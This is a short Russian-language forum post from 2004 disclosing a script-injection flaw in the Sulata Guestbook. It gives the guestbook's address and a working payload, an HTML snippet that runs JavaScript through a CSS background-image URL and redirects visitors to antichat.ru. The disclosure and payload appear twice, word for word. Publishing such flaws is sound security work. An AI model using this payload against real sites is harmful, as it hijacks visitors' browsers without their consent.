Егорыч+++
07.05.2004, 10:02
Уязвимость гостевой книги Sulata Guestbook .
В данной гостевой книги возможна вставка скрипта в тело сообщения. Гостевая книга находится по адресу http://www.sulata.com.pk/sulatagb/
Для примера в тело сообщения можно вставить следующее
<div id=aa>http://antichat.ru</div><a style=background-image:url(javascript:navigate(aa[0].innerText));></a> получаем редирект на antichat.ru
В данной гостевой книги возможна вставка скрипта в тело сообщения. Гостевая книга находится по адресу http://www.sulata.com.pk/sulatagb/
Для примера в тело сообщения можно вставить следующее
<div id=aa>http://antichat.ru</div><a style=background-image:url(javascript:navigate(aa[0].innerText));></a> получаем редирект на antichat.ru